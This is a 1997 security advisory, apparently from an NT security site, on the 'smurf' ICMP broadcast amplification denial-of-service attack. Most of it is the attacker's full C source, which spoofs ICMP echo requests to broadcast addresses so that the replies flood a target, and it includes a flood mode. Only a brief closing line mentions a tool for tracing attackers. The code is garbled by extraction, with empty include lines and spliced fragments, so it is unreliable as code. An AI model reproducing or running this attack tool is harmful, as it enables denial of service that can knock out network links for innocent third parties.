TCP/IP FLOODING

Reported October 13, 1997 by TFreak

Systems Affected

Any system employing TCP/IP

The Problem

The smurf attack is quite simple.  It has a list of broadcast addresses which it stores into an array, and sends a spoofed ICMP echo request to each of those addresses in series and starts again. The result is a devistating attack upon the spoofed IP. Depending on the amount of broadcast addresses used, many, many computers may respond to the echo request.

This attack can EASILY saturate a T1 circuit, rendering it completely useless.

HERE IS THE SMURF SOURCE CODE:

                              *  $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $*                              *  spoofs icmp packets from a host to various broadcast addresses resulting                              *  in multiple replies to that host from a single packet.                              *  disclaimer:                              *     I cannot and will not be held responsible nor legally bound for the                              *     malicious activities of individuals who come into possession of this                              *     program and I refuse to provide help or support of any kind and do NOT                              *     condone use of this program to deny service to anyone or any machine.                              *     This is for educational use only. Please Don"t abuse this.                              * TFreak                              */                              #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               void banner(void);                              void usage(char *);                              void smurf(int, struct sockaddr_in, u_long, int);                              void ctrlc(int);                              unsigned short in_chksum(u_short *, int);                              /* stamp */                              char id\[\] = $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $;                              int main (int argc, char *argv\[\])                              \{                                 struct sockaddr_in sin;                                 struct hostent *he;                                 FILE   *bcastfile;                                 int    i, sock, bcast, delay, num, pktsize, cycle = 0, x;                                 char   buf\[32\], **bcastaddr = malloc(8192);                                 banner();                                 signal(SIGINT, ctrlc);                                 if (argc h_addr, he->h_length);                                 sin.sin_family = AF_INET;                                 sin.sin_port = htons(0);                                 num = atoi(argv\[3\]);                                 delay = atoi(argv\[4\]);                                 pktsize = atoi(argv\[5\]);                                 if ((bcastfile = fopen(argv\[2\], r)) 

NULL) \{       perror(opening bcast file);       exit(-1);    \}    x = 0;    while (!feof(bcastfile)) \{       fgets(buf, 32, bcastfile);       if (buf\[0\]

"#" || buf\[0\]

"\n" || ! isdigit(buf\[0\])) continue;       for (i = 0; i 1024) \{       fprintf(stderr, ERROR: packet size must be                    \n\n                    target        = address to hit\n                    bcast file    = file to read broadcast addresses from\n                    num packets   = number of packets to send (0 = flood)\n                    packet delay  = wait between each packet (in ms)\n                    packet size   = size of packet (tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);    ip->ihl = 5;    ip->version = 4;    ip->ttl = 255;    ip->tos = 0;    ip->frag_off = 0;    ip->protocol = IPPROTO_ICMP;    ip->saddr = sin.sin_addr.s_addr;    ip->daddr = dest;    ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));    icmp->type = 8;    icmp->code = 0;    icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);    sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,           0, (struct sockaddr *)&sin, sizeof(struct sockaddr));    free(packet);           /* free willy! */ \} void ctrlc (int ignored) \{    puts(\nDone!\n);    exit(1); \} unsigned short in_chksum (u_short *addr, int len) \{    register int nleft = len;    register int sum = 0;    u_short answer = 0;    while (nleft > 1) \{       sum += *addr++;       nleft -= 2;    \}    if (nleft

1) \{       *(u_char *)(&answer) = *(u_char *)addr;       sum += answer;    \}    sum = (sum >> 16) + (sum + 0xffff);    sum += (sum >> 16);    answer = ~sum;    return(answer); \}

Stopping the Problem:

MCI has a tool called DoSTracker that may help you track down Smurf users.

To learn more about new NT security concerns, subscribe to NTSD.

Credit:
Reported by TFreak
Posted here at NTSecurity.Net October 12, 1997